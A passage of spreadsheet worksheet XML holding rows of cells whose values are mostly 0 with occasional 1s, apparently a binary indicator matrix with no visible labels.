      </c>
      <c r="AG3">
        <v>0</v>
      </c>
      <c r="AH3">
        <v>0</v>
      </c>
      <c r="AI3">
        <v>0</v>
      </c>
      <c r="AJ3">
        <v>0</v>
      </c>
      <c r="AK3">
        <v>0</v>
      </c>
      <c r="AL3">
        <v>0</v>
      </c>
      <c r="AM3">
        <v>0</v>
      </c>
      <c r="AN3">
        <v>0</v>
      </c>
      <c r="AO3">
        <v>0</v>
      </c>
      <c r="AP3">
        <v>0</v>
      </c>
      <c r="AQ3">
        <v>0</v>
      </c>
      <c r="AR3">
        <v>1</v>
      </c>
      <c r="AS3">
        <v>1</v>
      </c>
      <c r="AT3">
        <v>0</v>
      </c>
      <c r="AU3">
        <v>0</v>
      </c>
      <c r="AV3">
        <v>0</v>
      </c>
      <c r="AW3">
        <v>0</v>
      </c>
      <c r="AX3">
        <v>0</v>
      </c>
      <c r="AY3">
        <v>0</v>
      </c>
      <c r="AZ3">
        <v>0</v>
      </c>
      <c r="BA3">
        <v>0</v>
      </c>
      <c r="BB3">
        <v>0</v>
      </c>
      <c r="BC3">
        <v>0</v>
      </c>
      <c r="BD3">
        <v>0</v>
      </c>
      <c r="BE3">
        <v>0</v>
      </c>
      <c r="BF3">
        <v>0</v>
      </c>
      <c r="BG3">
        <v>1</v>
      </c>
      <c r="BH3">
        <v>0</v>
      </c>
      <c r="BI3">
        <v>0</v>
      </c>
      <c r="BJ3">
        <v>0</v>
      </c>
      <c r="BK3">
        <v>0</v>
      </c>
      <c r="BL3">
        <v>0</v>
      </c>
      <c r="BM3">
        <v>0</v>
      </c>
      <c r="BN3">
        <v>0</v>
      </c>
      <c r="BO3">
        <v>0</v>
      </c>
      <c r="BP3">
        <v>0</v>
      </c>
      <c r="BQ3">
        <v>0</v>
      </c>
      <c r="BR3">
        <v>0</v>
      </c>
      <c r="BS3">
        <v>0</v>
      </c>
      <c r="BT3">
        <v>0</v>
      </c>
      <c r="BU3">
        <v>0</v>
      </c>
      <c r="BV3">
        <v>0</v>
      </c>
      <c r="BW3">
        <v>0</v>
      </c>
      <c r="BX3">
        <v>1</v>
      </c>
      <c r="BY3">
        <v>0</v>
      </c>
      <c r="BZ3">
        <v>0</v>
      </c>
      <c r="CA3">
        <v>0</v>
      </c>
      <c r="CB3">
        <v>0</v>
      </c>
      <c r="CC3">
        <v>0</v>
      </c>
      <c r="CD3">
        <v>0</v>
      </c>
      <c r="CE3">
        <v>0</v>
      </c>
      <c r="CF3">
        <v>0</v>
      </c>
      <c r="CG3">
        <v>0</v>
      </c>
      <c r="CH3">
        <v>0</v>
      </c>
      <c r="CI3">
        <v>0</v>
      </c>
      <c r="CJ3">
        <v>0</v>
      </c>
      <c r="CK3">
        <v>0</v>
      </c>
      <c r="CL3">
        <v>0</v>
      </c>
      <c r="CM3">
        <v>0</v>
      </c>
      <c r="CN3">
        <v>0</v>
      </c>
      <c r="CO3">
        <v>0</v>
      </c>
      <c r="CP3">
        <v>0</v>
      </c>
      <c r="CQ3">
        <v>0</v>
      </c>
      <c r="CR3">
        <v>0</v>
      </c>
      <c r="CS3">
        <v>0</v>
      </c>
      <c r="CT3">
        <v>0</v>
      </c>
      <c r="CU3">
        <v>0</v>
      </c>
      <c r="CV3">
        <v>0</v>
      </c>
      <c r="CW3">
        <v>0</v>
      </c>
      <c r="CX3">
        <v>0</v>
      </c>
      <c r="CY3">
        <v>1</v>
      </c>
      <c r="CZ3">
        <v>0</v>
      </c>
      <c r="DA3">
        <v>0</v>
      </c>
      <c r="DB3">
        <v>0</v>
      </c>
      <c r="DC3">
        <v>0</v>
      </c>
      <c r="DD3">
        <v>0</v>
      </c>
      <c r="DE3">
        <v>0</v>
      </c>
      <c r="DF3">
        <v>0</v>
      </c>
      <c r="DG3">
        <v>0</v>
      </c>
      <c r="DH3">
        <v>0</v>
      </c>
      <c r="DI3">
        <v>0</v>
      </c>
      <c r="DJ3">
        <v>0</v>
      </c>
      <c r="DK3">
        <v>0</v>
      </c>
      <c r="DL3">
        <v>0</v>
      </c>
      <c r="DM3">
        <v>0</v>
      </c>
      <c r="DN3">
        <v>0</v>
      </c>
      <c r="DO3">
        <v>1</v>
      </c>
      <c r="DP3">
        <v>0</v>
      </c>
      <c r="DQ3">
        <v>0</v>
      </c>
      <c r="DR3">
        <v>0</v>
      </c>
      <c r="DS3">
        <v>0</v>
      </c>
      <c r="DT3">
        <v>0</v>
      </c>
      <c r="DU3">
        <v>0</v>
      </c>
      <c r="DV3">
        <v>0</v>
      </c>
      <c r="DW3">
        <v>0</v>
      </c>
      <c r="DX3">
        <v>0</v>
      </c>
      <c r="DY3">
        <v>0</v>
      </c>
      <c r="DZ3">
        <v>0</v>
      </c>
      <c r="EA3">
        <v>0</v>
      </c>
      <c r="EB3">
        <v>0</v>
      </c>
      <c r="EC3">
        <v>0</v>
      </c>
      <c r="ED3">
        <v>0</v>
      </c>
      <c r="EE3">
        <v>0</v>
      </c>
      <c r="EF3">
        <v>1</v>
      </c>
      <c r="EG3">
        <v>0</v>
      </c>
      <c r="EH3">
        <v>0</v>
      </c>
      <c r="EI3">
        <v>0</v>
      </c>
      <c r="EJ3">
        <v>0</v>
      </c>
      <c r="EK3">
        <v>0</v>
      </c>
      <c r="EL3">
        <v>0</v>
      </c>
      <c r="EM3">
        <v>0</v>
      </c>
      <c r="EN3">
        <v>0</v>
      </c>
      <c r="EO3">
        <v>0</v>
      </c>
      <c r="EP3">
        <v>0</v>
      </c>
      <c r="EQ3">
        <v>0</v>
      </c>
      <c r="ER3">
        <v>0</v>
      </c>
      <c r="ES3">
        <v>0</v>
      </c>
      <c r="ET3">
        <v>0</v>
      </c>
      <c r="EU3">
        <v>0</v>
      </c>
      <c r="EV3">
        <v>0</v>
      </c>
      <c r="EW3">
        <v>0</v>
      </c>
      <c r="EX3">
        <v>0</v>
      </c>
      <c r="EY3">
        <v>1</v>
      </c>
      <c r="EZ3">
        <v>0</v>
      </c>
      <c r="FA3">
        <v>0</v>
      </c>
      <c r="FB3">
        <v>0</v>
      </c>
      <c r="FC3">
        <v>1</v>
      </c>
      <c r="FD3">
        <v>0</v>
      </c>
      <c r="FE3">
        <v>0</v>
      </c>
      <c r="FF3">
        <v>0</v>
      </c>
      <c r="FG3">
        <v>0</v>
      </c>
      <c r="FH3">
        <v>0</v>
      </c>
      <c r="FI3">
        <v>0</v>
      </c>
      <c r="FJ3">
        <v>0</v>
      </c>
      <c r="FK3">
        <v>0</v>
      </c>
      <c r="FL3">
        <v>0</v>
      </c>
      <c r="FM3">
        <v>0</v>
      </c>
      <c r="FN3">
        <v>0</v>
      </c>
      <c r="FO3">
        <v>0</v>
      </c>
      <c r="FP3">
        <v>0</v>
      </c>
      <c r="FQ3">
        <v>0</v>
      </c>
      <c r="FR3">
        <v>0</v>
      </c>
      <c r="FS3">
        <v>0</v>
      </c>
      <c r="FT3">
        <v>0</v>
      </c>
      <c r="FU3">
        <v>0</v>
      </c>
      <c r="FV3">
        <v>0</v>
      </c>
      <c r="FW3">
        <v>0</v>
      </c>
      <c r="FX3">
        <v>0</v>
      </c>
      <c r="FY3">
        <v>0</v>
      </c>
      <c r="FZ3">
        <v>0</v>
      </c>
      <c r="GA3">
        <v>0</v>
      </c>
      <c r="GB3">
        <v>0</v>
      </c>
      <c r="GC3">
        <v>0</v>
      </c>
      <c r="GD3">
        <v>0</v>
      </c>
      <c r="GE3">
        <v>0</v>
      </c>
      <c r="GF3">
        <v>1</v>
      </c>
      <c r="GG3">
        <v>0</v>
      </c>
      <c r="GH3">
        <v>0</v>
      </c>
      <c r="GI3">
        <v>0</v>
      </c>
      <c r="GJ3">
        <v>0</v>
      </c>
      <c r="GK3">
        <v>0</v>
      </c>
      <c r="GL3">
        <v>0</v>
      </c>
      <c r="GM3">
        <v>0</v>
      </c>
      <c r="GN3">
        <v>0</v>
      </c>
      <c r="GO3">
        <v>0</v>
      </c>
      <c r="GP3">
        <v>0</v>
      </c>
      <c r="GQ3">
        <v>0</v>
      </c>
      <c r="GR3">
        <v>0</v>
      </c>
      <c r="GS3">
        <v>1</v>
      </c>
      <c r="GT3">
        <v>0</v>
      </c>
      <c r="GU3">
        <v>0</v>
      </c>
      <c r="GV3">
        <v>0</v>
      </c>
      <c r="GW3">
        <v>0</v>
      </c>
      <c r="GX3">
        <v>0</v>
      </c>
      <c r="GY3">
        <v>0</v>
      </c>
      <c r="GZ3">
        <v>0</v>
      </c>
      <c r="HA3">
        <v>0</v>
      </c>
      <c r="HB3">
        <v>1</v>
      </c>
      <c r="HC3">
        <v>0</v>
      </c>
      <c r="HD3">
        <v>0</v>
      </c>
      <c r="HE3">
        <v>0</v>
      </c>
      <c r="HF3">
        <v>0</v>
      </c>
      <c r="HG3">
        <v>0</v>
      </c>
      <c r="HH3">
        <v>0</v>
      </c>
      <c r="HI3">
        <v>0</v>
      </c>
      <c r="HJ3">
        <v>0</v>
      </c>
      <c r="HK3">
        <v>0</v>
      </c>
      <c r="HL3">
        <v>0</v>
      </c>
      <c r="HM3">
        <v>0</v>
      </c>
      <c r="HN3">
        <v>0</v>
      </c>
      <c r="HO3">
        <v>0</v>
      </c>
      <c r="HP3">
        <v>0</v>
      </c>
      <c r="HQ3">
        <v>0</v>
      </c>
      <c r="HR3">
        <v>0</v>
      </c>
      <c r="HS3">
        <v>0</v>
      </c>
      <c r="HT3">
        <v>0</v>
      </c>
      <c r="HU3">
        <v>0</v>
      </c>
      <c r="HV3">
        <v>0</v>
      </c>
      <c r="HW3">
        <v>0</v>
      </c>
      <c r="HX3">
        <v>0</v>
      </c>
      <c r="HY3">
        <v>0</v>
      </c>
      <c r="HZ3">
        <v>0</v>
      </c>
      <c r="IA3">
        <v>0</v>
      </c>
      <c r="IB3">
        <v>0</v>
      </c>
      <c r="IC3">
        <v>0</v>
      </c>
      <c r="ID3">
        <v>0</v>
      </c>
      <c r="IE3">
        <v>0</v>
      </c>
      <c r="IF3">
        <v>0</v>
      </c>
      <c r="IG3">
        <v>0</v>
      </c>
      <c r="IH3">
        <v>0</v>
      </c>
      <c r="II3">
        <v>0</v>
      </c>
      <c r="IJ3">
        <v>0</v>
      </c>
      <c r="IK3">
        <v>0</v>
      </c>
      <c r="IL3">
        <v>0</v>
      </c>
      <c r="IM3">
        <v>0</v>
      </c>
      <c r="IN3">
        <v>0</v>
      </c>
      <c r="IO3">
        <v>0</v>
      </c>
      <c r="IP3">
        <v>0</v>
      </c>
      <c r="IQ3">
        <v>0</v>
      </c>
      <c r="IR3">
        <v>0</v>
      </c>
      <c r="IS3">
        <v>0</v>
      </c>
      <c r="IT3">
        <v>0</v>
      </c>
      <c r="IU3">
        <v>0</v>
      </c>
      <c r="IV3">
        <v>0</v>
      </c>
      <c r="IW3">
        <v>0</v>
      </c>
      <c r="IX3">
        <v>0</v>
      </c>
      <c r="IY3">
        <v>0</v>
      </c>
      <c r="IZ3">
        <v>0</v>
      </c>
      <c r="JA3">
        <v>0</v>
      </c>
      <c r="JB3">
        <v>0</v>
      </c>
      <c r="JC3">
        <v>0</v>
      </c>
      <c r="JD3">
        <v>0</v>
      </c>
      <c r="JE3">
        <v>0</v>
      </c>
      <c r="JF3">
        <v>0</v>
      </c>
      <c r="JG3">
        <v>0</v>
      </c>
      <c r="JH3">
        <v>0</v>
      </c>
      <c r="JI3">
        <v>0</v>
      </c>
      <c r="JJ3">
        <v>0</v>
      </c>
      <c r="JK3">
        <v>0</v>
      </c>
      <c r="JL3">
        <v>0</v>
      </c>
      <c r="JM3">
        <v>0</v>
      </c>
      <c r="JN3">
        <v>0</v>
      </c>
      <c r="JO3">
        <v>0</v>
      </c>
      <c r="JP3">
        <v>0</v>
      </c>
      <c r="JQ3">
        <v>0</v>
      </c>
      <c r="JR3">
        <v>0</v>
      </c>
      <c r="JS3">
        <v>0</v>
      </c>
      <c r="JT3">
        <v>0</v>
      </c>
      <c r="JU3">
        <v>0</v>
      </c>
      <c r="JV3">
        <v>0</v>
      </c>
      <c r="JW3">
        <v>0</v>
      </c>
      <c r="JX3">
        <v>0</v>
      </c>
      <c r="JY3">
        <v>0</v>
      </c>
      <c r="JZ3">
        <v>1</v>
      </c>
      <c r="KA3">
        <v>0</v>
      </c>
      <c r="KB3">
        <v>0</v>
      </c>
      <c r="KC3">
        <v>0</v>
      </c>
      <c r="KD3">
        <v>0</v>
      </c>
      <c r="KE3">
        <v>0</v>
      </c>
      <c r="KF3">
        <v>0</v>
      </c>
      <c r="KG3">
        <v>0</v>
      </c>
      <c r="KH3">
        <v>0</v>
      </c>
      <c r="KI3">
        <v>0</v>
      </c>
      <c r="KJ3">
        <v>0</v>
      </c>
      <c r="KK3">
        <v>0</v>
      </c>
      <c r="KL3">
        <v>0</v>
      </c>
      <c r="KM3">
        <v>0</v>
      </c>
      <c r="KN3">
        <v>0</v>
      </c>
      <c r="KO3">
        <v>0</v>
      </c>
      <c r="KP3">
        <v>0</v>
      </c>
      <c r="KQ3">
        <v>1</v>
      </c>
      <c r="KR3">
        <v>0</v>
      </c>
      <c r="KS3">
        <v>0</v>
      </c>
      <c r="KT3">
        <v>0</v>
      </c>
      <c r="KU3">
        <v>0</v>
      </c>
      <c r="KV3">
        <v>0</v>
      </c>
      <c r="KW3">
        <v>0</v>
      </c>
      <c r="KX3">
        <v>1</v>
      </c>
      <c r="KY3">
        <v>0</v>
      </c>
      <c r="KZ3">
        <v>0</v>
      </c>
      <c r="LA3">
        <v>0</v>
      </c>
      <c r="LB3">
        <v>0</v>
      </c>
      <c r="LC3">
        <v>0</v>
      </c>
      <c r="LD3">
        <v>0</v>
      </c>
      <c r="LE3">
        <v>0</v>
      </c>
      <c r="LF3">
        <v>0</v>
      </c>
      <c r="LG3">
        <v>0</v>
      </c>
      <c r="LH3">
        <v>0</v>
      </c>
      <c r="LI3">
        <v>0</v>
      </c>
      <c r="LJ3">
        <v>1</v>
      </c>
      <c r="LK3">
        <v>0</v>
      </c>
      <c r="LL3">
        <v>0</v>
      </c>
      <c r="LM3">
        <v>0</v>
      </c>
      <c r="LN3">
        <v>0</v>
      </c>
      <c r="LO3">
        <v>0</v>
      </c>
      <c r="LP3">
        <v>0</v>
      </c>
      <c r="LQ3">
        <v>0</v>
      </c>
      <c r="LR3">
        <v>0</v>
      </c>
      <c r="LS3">
        <v>0</v>
      </c>
      <c r="LT3">
        <v>0</v>
      </c>
      <c r="LU3">
        <v>0</v>
      </c>
      <c r="LV3">
        <v>0</v>
      </c>
      <c r="LW3">
        <v>1</v>
      </c>
      <c r="LX3">
        <v>0</v>
      </c>
      <c r="LY3">
        <v>0</v>
      </c>
      <c r="LZ3">
        <v>1</v>
      </c>
      <c r="MA3">
        <v>0</v>
      </c>
      <c r="MB3">
        <v>0</v>
      </c>
      <c r="MC3">
        <v>0</v>
      </c>
      <c r="MD3">
        <v>0</v>
      </c>
      <c r="ME3">
        <v>0</v>
      </c>
      <c r="MF3">
        <v>0</v>
      </c>
      <c r="MG3">
        <v>0</v>
      </c>
      <c r="MH3">
        <v>1</v>
      </c>
      <c r="MI3">
        <v>0</v>
      </c>
      <c r="MJ3">
        <v>0</v>
      </c>
      <c r="MK3">
        <v>0</v>
      </c>
      <c r="ML3">
        <v>0</v>
      </c>
      <c r="MM3">
        <v>0</v>
      </c>
      <c r="MN3">
        <v>0</v>
      </c>
      <c r="MO3">
        <v>0</v>
      </c>
      <c r="MP3">
        <v>0</v>
      </c>
      <c r="MQ3">
        <v>0</v>
      </c>
      <c r="MR3">
        <v>0</v>
      </c>
      <c r="MS3">
        <v>0</v>
      </c>
      <c r="MT3">
        <v>0</v>
      </c>
      <c r="MU3">
        <v>0</v>
      </c>
      <c r="MV3">
        <v>0</v>
      </c>
      <c r="MW3">
        <v>0</v>
      </c>
      <c r="MX3">
        <v>0</v>
      </c>
      <c r="MY3">
        <v>0</v>
      </c>
      <c r="MZ3">
        <v>0</v>
      </c>
      <c r="NA3">
        <v>0</v>
      </c>
      <c r="NB3">
        <v>0</v>
      </c>
      <c r="NC3">
        <v>0</v>
      </c>
      <c r="ND3">
        <v>0</v>
      </c>
      <c r="NE3">
        <v>0</v>
      </c>
      <c r="NF3">
        <v>0</v>
      </c>
      <c r="NG3">
        <v>0</v>
      </c>
      <c r="NH3">
        <v>0</v>
      </c>
      <c r="NI3">
        <v>0</v>
      </c>
      <c r="NJ3">
        <v>0</v>
      </c>
      <c r="NK3">
        <v>0</v>
      </c>
      <c r="NL3">
        <v>0</v>
      </c>
      <c r="NM3">
        <v>0</v>
      </c>
      <c r="NN3">
        <v>0</v>
      </c>
      <c r="NO3">
        <v>0</v>
      </c>
      <c r="NP3">
        <v>1</v>
      </c>
      <c r="NQ3">
        <v>0</v>
      </c>
      <c r="NR3">
        <v>0</v>
      </c>
      <c r="NS3">
        <v>0</v>
      </c>
      <c r="NT3">
        <v>0</v>
      </c>
      <c r="NU3">
        <v>0</v>
      </c>
      <c r="NV3">
        <v>1</v>
      </c>
      <c r="NW3">
        <v>0</v>
      </c>
      <c r="NX3">
        <v>1</v>
      </c>
      <c r="NY3">
        <v>0</v>
      </c>
      <c r="NZ3">
        <v>0</v>
      </c>
      <c r="OA3">
        <v>0</v>
      </c>
      <c r="OB3">
        <v>0</v>
      </c>
      <c r="OC3">
        <v>0</v>
      </c>
      <c r="OD3">
        <v>0</v>
      </c>
      <c r="OE3">
        <v>0</v>
      </c>
      <c r="OF3">
        <v>0</v>
      </c>
      <c r="OG3">
        <v>0</v>
      </c>
      <c r="OH3">
        <v>0</v>
      </c>
      <c r="OI3">
        <v>0</v>
      </c>
      <c r="OJ3">
        <v>0</v>
      </c>
      <c r="OK3">
        <v>0</v>
      </c>
      <c r="OL3">
        <v>0</v>
      </c>
      <c r="OM3">
        <v>0</v>
      </c>
      <c r="ON3">
        <v>0</v>
      </c>
      <c r="OO3">
        <v>0</v>
      </c>
      <c r="OP3">
        <v>0</v>
      </c>
      <c r="OQ3">
        <v>0</v>
      </c>
      <c r="OR3">
        <v>0</v>
      </c>
      <c r="OS3">
        <v>0</v>
      </c>
      <c r="OT3">
        <v>0</v>
      </c>
      <c r="OU3">
        <v>0</v>
      </c>
      <c r="OV3">
        <v>0</v>
      </c>
      <c r="OW3">
        <v>0</v>
      </c>
      <c r="OX3">
        <v>0</v>
      </c>
      <c r="OY3">
        <v>0</v>
      </c>
      <c r="OZ3">
        <v>0</v>
      </c>
      <c r="PA3">
        <v>0</v>
      </c>
      <c r="PB3">
        <v>0</v>
      </c>
      <c r="PC3">
        <v>0</v>
      </c>
      <c r="PD3">
        <v>0</v>
      </c>
      <c r="PE3">
        <v>0</v>
      </c>
      <c r="PF3">
        <v>0</v>
      </c>
      <c r="PG3">
        <v>0</v>
      </c>
      <c r="PH3">
        <v>0</v>
      </c>
      <c r="PI3">
        <v>0</v>
      </c>
      <c r="PJ3">
        <v>1</v>
      </c>
      <c r="PK3">
        <v>0</v>
      </c>
      <c r="PL3">
        <v>0</v>
      </c>
      <c r="PM3">
        <v>0</v>
      </c>
      <c r="PN3">
        <v>0</v>
      </c>
      <c r="PO3">
        <v>0</v>
      </c>
      <c r="PP3">
        <v>0</v>
      </c>
      <c r="PQ3">
        <v>0</v>
      </c>
      <c r="PR3">
        <v>0</v>
      </c>
      <c r="PS3">
        <v>0</v>
      </c>
      <c r="PT3">
        <v>0</v>
      </c>
      <c r="PU3">
        <v>0</v>
      </c>
      <c r="PV3">
        <v>0</v>
      </c>
      <c r="PW3">
        <v>0</v>
      </c>
      <c r="PX3">
        <v>0</v>
      </c>
      <c r="PY3">
        <v>0</v>
      </c>
      <c r="PZ3">
        <v>0</v>
      </c>
      <c r="QA3">
        <v>0</v>
      </c>
      <c r="QB3">
        <v>0</v>
      </c>
      <c r="QC3">
        <v>0</v>
      </c>
      <c r="QD3">
        <v>0</v>
      </c>
      <c r="QE3">
        <v>0</v>
      </c>
      <c r="QF3">
        <v>0</v>
      </c>
      <c r="QG3">
        <v>0</v>
      </c>
      <c r="QH3">
        <v>0</v>
      </c>
      <c r="QI3">
        <v>0</v>
      </c>
      <c r="QJ3">
        <v>0</v>
      </c>
      <c r="QK3">
        <v>0</v>
      </c>
      <c r="QL3">
        <v>0</v>
      </c>
      <c r="QM3">
        <v>0</v>
      </c>
      <c r="QN3">
        <v>0</v>
      </c>
      <c r="QO3">
        <v>0</v>
      </c>
      <c r="QP3">
        <v>0</v>
      </c>
      <c r="QQ3">
        <v>0</v>
      </c>
      <c r="QR3">
        <v>0</v>
      </c>
      <c r="QS3">
        <v>0</v>
      </c>
      <c r="QT3">
        <v>1</v>
      </c>
      <c r="QU3">
        <v>0</v>
      </c>
      <c r="QV3">
        <v>0</v>
      </c>
      <c r="QW3">
        <v>0</v>
      </c>
      <c r="QX3">
        <v>0</v>
      </c>
      <c r="QY3">
        <v>0</v>
      </c>
      <c r="QZ3">
        <v>0</v>
      </c>
      <c r="RA3">
        <v>0</v>
      </c>
      <c r="RB3">
        <v>0</v>
      </c>
      <c r="RC3">
        <v>0</v>
      </c>
      <c r="RD3">
        <v>0</v>
      </c>
      <c r="RE3">
        <v>0</v>
      </c>
      <c r="RF3">
        <v>0</v>
      </c>
      <c r="RG3">
        <v>0</v>
      </c>
      <c r="RH3">
        <v>0</v>
      </c>
      <c r="RI3">
        <v>0</v>
      </c>
      <c r="RJ3">
        <v>0</v>
      </c>
      <c r="RK3">
        <v>0</v>
      </c>
      <c r="RL3">
        <v>0</v>
      </c>
      <c r="RM3">
        <v>0</v>
      </c>
      <c r="RN3">
        <v>0</v>
      </c>
      <c r="RO3">
        <v>0</v>
      </c>
      <c r="RP3">
        <v>0</v>
      </c>
      <c r="RQ3">
        <v>0</v>
      </c>
      <c r="RR3">
        <v>0</v>
      </c>
      <c r="RS3">
        <v>0</v>
      </c>
      <c r="RT3">
        <v>0</v>
      </c>
      <c r="RU3">
        <v>0</v>
      </c>
      <c r="RV3">
        <v>0</v>
      </c>
      <c r="RW3">
        <v>0</v>
      </c>
      <c r="RX3">
        <v>0</v>
      </c>
      <c r="RY3">
        <v>0</v>
      </c>
      <c r="RZ3">
        <v>0</v>
      </c>
      <c r="SA3">
        <v>0</v>
      </c>
    </row>
    <row r="4" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A4" s="6" t="s">
        <v>2430</v>
      </c>
      <c r="B4">
        <v>2</v>
      </c>
      <c r="C4">
        <v>0</v>
      </c>
      <c r="D4">
        <v>0</v>
      </c>
      <c r="E4">
        <v>0</v>
      </c>
      <c r="F4">
        <v>0</v>
      </c>
      <c r="G4">
        <v>0</v>
      </c>
      <c r="H4">
        <v>0</v>
      </c>
      <c r="I4">
        <v>0</v>
      </c>
      <c r="J4">
        <v>0</v>
      </c>
      <c r="K4">
        <v>0</v>
      </c>
      <c r="L4">
        <v>0</v>
      </c>
      <c r="M4">
        <v>0</v>
      </c>
      <c r="N4">
        <v>0</v>
      </c>
      <c r="O4">
        <v>0</v>
      </c>
      <c r="P4">
        <v>0</v>
      </c>
      <c r="Q4">
        <v>0</v>
      </c>
      <c r="R4">
        <v>0</v>
      </c>
      <c r="S4">
        <v>0</v>
      </c>
      <c r="T4">
        <v>0</v>
      </c>
      <c r="U4">
        <v>0</v>
      </c>
      <c r="V4">
        <v>0</v>
      </c>
      <c r="W4">
        <v>0</v>
      </c>
      <c r="X4">
        <v>0</v>
      </c>
      <c r="Y4">
        <v>0</v>
      </c>
      <c r="Z4">
        <v>0</v>
      </c>
      <c r="AA4">
        <v>0</v>
      </c>
      <c r="AB4">
        <v>0</v>
      </c>
      <c r="AC4">
        <v>0</v>
      </c>
      <c r="AD4">
        <v>0</v>
      </c>
      <c r="AE4">
        <v>0</v>
      </c>
      <c r="AF4">
        <v>0</v>
      </c>
      <c r="AG4">
        <v>0</v>
      </c>
      <c r="AH4">
        <v>0</v>
      </c>
      <c r="AI4">
        <v>0</v>
      </c>
      <c r="AJ4">
        <v>0</v>
      </c>
      <c r="AK4">
        <v>0</v>
      </c>
      <c r="AL4">
        <v>0</v>
      </c>
      <c r="AM4">
        <v>0</v>
      </c>
      <c r="AN4">
        <v>0</v>
      </c>
      <c r="AO4">
        <v>0</v>
      </c>
      <c r="AP4">
        <v>0</v>
      </c>
      <c r="AQ4">
        <v>0</v>
      </c>
      <c r="AR4">
        <v>0</v>
      </c>
      <c r="AS4">
        <v>0</v>
      </c>
      <c r="AT4">
        <v>0</v>
      </c>
      <c r="AU4">
        <v>0</v>
      </c>
      <c r="AV4">
        <v>0</v>
      </c>
      <c r="AW4">
        <v>0</v>
      </c>
      <c r="AX4">
        <v>0</v>
      </c>
      <c r="AY4">
        <v>0</v>
      </c>
      <c r="AZ4">
        <v>0</v>
      </c>
      <c r="BA4">
        <v>0</v>
      </c>
      <c r="BB4">
        <v>0</v>
      </c>
      <c r="BC4">
        <v>0</v>
      </c>
      <c r="BD4">
        <v>0</v>
      </c>
      <c r="BE4">
        <v>0</v>
      </c>
      <c r="BF4">
        <v>0</v>
      </c>
      <c r="BG4">
        <v>0</v>
      </c>
      <c r="BH4">
        <v>0</v>
      </c>
      <c r="BI4">
        <v>0</v>
      </c>
      <c r="BJ4">
        <v>0</v>
      </c>
      <c r="BK4">
        <v>0</v>
      </c>
      <c r="BL4">
        <v>0</v>
      </c>
      <c r="BM4">
        <v>0</v>
      </c>
      <c r="BN4">
        <v>0</v>
      </c>
      <c r="BO4">
        <v>0</v>
      </c>
      <c r="BP4">
        <v>0</v>
      </c>
      <c r="BQ4">
        <v>0</v>
      </c>
      <c r="BR4">
        <v>0</v>
      </c>
      <c r="BS4">
        <v>0</v>
      </c>
      <c r="BT4">
        <v>0</v>
      </c>
      <c r="BU4">
        <v>0</v>
      </c>
      <c r="BV4">
        <v>0</v>
      </c>
      <c r="BW4">
        <v>0</v>
      </c>
      <c r="BX4">
        <v>0</v>
      </c>
      <c r="BY4">
        <v>0</v>
      </c>
      <c r="BZ4">
        <v>0</v>
      </c>
      <c r="CA4">
        <v>0</v>
      </c>
      <c r="CB4">
        <v>0</v>
      </c>
      <c r="CC4">
        <v>0</v>
      </c>
      <c r="CD4">
        <v>0</v>
      </c>
      <c r="CE4">
        <v>0</v>
      </c>
      <c r="CF4">
        <v>0</v>
      </c>
      <c r="CG4">
        <v>0</v>
      </c>
      <c r="CH4">
        <v>0</v>
      </c>
      <c r="CI4">
        <v>0</v>
      </c>
      <c r="CJ4">
        <v>0</v>
      </c>
      <c r="CK4">
        <v>0</v>
      </c>
      <c r="CL4">
        <v>0</v>
      </c>
      <c r="CM4">
        <v>0</v>
      </c>
      <c r="CN4">
        <v>0</v>
      </c>
      <c r="CO4">
        <v>0</v>
      </c>
      <c r="CP4">
        <v>0</v>
      </c>
      <c r="CQ4">
        <v>0</v>
      </c>
      <c r="CR4">
        <v>0</v>
      </c>
      <c r="CS4">
        <v>0</v>
      </c>
      <c r="CT4">
        <v>0</v>
      </c>
      <c r="CU4">
        <v>0</v>
      </c>
      <c r="CV4">
        <v>0</v>
      </c>
      <c r="CW4">
        <v>0</v>
      </c>
      <c r="CX4">
        <v>0</v>
      </c>
      <c r="CY4">
        <v>0</v>
      </c>
      <c r="CZ4">
        <v>0</v>
      </c>
      <c r="DA4">
        <v>0</v>
      </c>
      <c r="DB4">
        <v>0</v>
      </c>
      <c r="DC4">
        <v>0</v>
      </c>
      <c r="DD4">
        <v>0</v>
      </c>
      <c r="DE4">
        <v>0</v>
      </c>
      <c r="DF4">
        <v>0</v>
      </c>
      <c r="DG4">
        <v>0</v>
      </c>
      <c r="DH4">
        <v>0</v>
      </c>
      <c r="DI4">
        <v>0</v>
      </c>
      <c r="DJ4">
        <v>0</v>
      </c>
      <c r="DK4">
        <v>0</v>
      </c>
      <c r="DL4">
        <v>0</v>
      </c>
      <c r="DM4">
        <v>0</v>
      </c>
      <c r="DN4">
        <v>0</v>
      </c>
      <c r="DO4">
        <v>0</v>
      </c>
      <c r="DP4">
        <v>0</v>
      </c>
      <c r="DQ4">
        <v>0</v>
      </c>
      <c r="DR4">
        <v>0</v>
      </c>
      <c r="DS4">
        <v>1</v>
      </c>
      <c r="DT4">
        <v>0</v>
      </c>
      <c r="DU4">
        <v>0</v>
      </c>
      <c r="DV4">
        <v>0</v>
      </c>
      <c r="DW4">
        <v>0</v>
      </c>
      <c r="DX4">
        <v>0</v>
      </c>
      <c r="DY4">
        <v>0</v>
      </c>
      <c r="DZ4">
        <v>0</v>
      </c>
      <c r="EA4">
        <v>0</v>
      </c>
      <c r="EB4">
        <v>0</v>
      </c>
      <c r="EC4">
        <v>0</v>
      </c>
      <c r="ED4">
        <v>0</v>
      </c>
      <c r="EE4">
        <v>0</v>
      </c>
      <c r="EF4">
        <v>0</v>
      </c>
      <c r="EG4">
        <v>0</v>
      </c>
      <c r="EH4">
        <v>0</v>
      </c>
      <c r="EI4">
        <v>0</v>
      </c>
      <c r="EJ4">
        <v>0</v>
      </c>
      <c r="EK4">
        <v>0</v>
      </c>
      <c r="EL4">
        <v>0</v>
      </c>
      <c r="EM4">
        <v>0</v>
      </c>
      <c r="EN4">
        <v>0</v>
      </c>
      <c r="EO4">
        <v>0</v>
      </c>
      <c r="EP4">
        <v>0</v>
      </c>
      <c r="EQ4">
        <v>0</v>
      </c>
      <c r="ER4">
        <v>0</v>
      </c>
      <c r="ES4">
        <v>0</v>
      </c>
      <c r="ET4">
        <v>0</v>
      </c>
      <c r="EU4">
        <v>0</v>
      </c>
      <c r="EV4">
        <v>0</v>
      </c>
      <c r="EW4">
        <v>0</v>
      </c>
      <c r="EX4">
        <v>0</v>
      </c>
      <c r="EY4">
        <v>0</v>
      </c>
      <c r="EZ4">
        <v>0</v>
      </c>
      <c r="FA4">
        <v>0</v>
      </c>
      <c r="FB4">
        <v>0</v>
      </c>
